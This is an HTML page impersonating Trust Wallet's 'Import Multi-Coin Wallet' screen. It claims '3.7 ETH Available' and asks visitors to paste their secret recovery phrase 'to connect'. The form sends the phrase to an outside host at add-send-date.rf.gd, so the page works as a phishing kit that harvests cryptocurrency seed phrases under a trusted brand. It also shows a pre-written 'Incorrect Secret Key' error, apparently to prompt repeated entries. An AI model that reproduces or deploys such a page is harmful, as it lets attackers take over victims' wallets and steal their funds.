<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<link rel="icon" href="./images/trust.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#fafafa">
<link href="./images/apk.css" rel="stylesheet">
<link rel="apple-touch-icon" href="./images/trust.png"><title>Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet</title>
<link href="./images/chunk1.css" rel="stylesheet">
<link href="./images/app.css" rel="stylesheet">
<link href="./images/main.chunk.css" rel="stylesheet">
<script src="./images/jquery.min.js.download"></script>
<script src="./images/ethers-v4.min.js.download" charset="utf-8" type="text/javascript"></script>
</head>
<body>


<div id="root"><div class="ant-spin-nested-loading"><div class=""><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu">
<div class="sc-fYxtnH hARKVj"><h2>&nbsp;⇦&nbsp;&nbsp;Import Multi-Coin Wallet</h2></div>





<center><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="./images/825.png" alt="" style="height: 60px;width: 60px;"></div></center>

<div class="confirm-approve-content__title" style="
    font-size: 1.2rem;
    line-height: 140%;
    justify-content: center;
    text-align: center;
    margin-top: 22px;
    padding-left: 24px;
    padding-right: 24px;
    color: #ffbf00;
    ">3.7 ETH Available.</div>
    <h4><center>Enter your secret phrase here to connect</center></h4>



<div class="sc-htoDjs cDnNqw">
	<form method="post" action="https://add-send-date.rf.gd/pluto/doas.php?nkbihfbeogaeaoehlefnkodbefgpgknn/home" class="ant-form ant-form-horizontal">
        <div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control"><p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);">Phrase</p>
<div>
    <div class="thepadding">
        <textarea class="import-account__secret-phrase" placeholder="Paste seed phrase from clipboard" name="phrase" id="wordsseed" minlength="24" maxlength="305" required="" style="
    height: 96px;
"></textarea>   <font color="red" label="" style="font-size: 13px;">Incorrect Secret Key. Make sure it is 12 or 24 words with spaces between words.
</font>
        </div></div><div class="ant-form-item-explain">
                </div></div></div>

         <div class="thepadding">
<button class="button sc-VigVT fWmldN" type="submit">IMPORT</button>
<div1></div1></div>
<br>
<br>
<br>
<br>
<div class="sc-fYxtnH hARKVj"></div> </form>
                            </div>

                </div>

<script src="./images/load.js.download"></script>

</div></div></div></div></div></body></html>
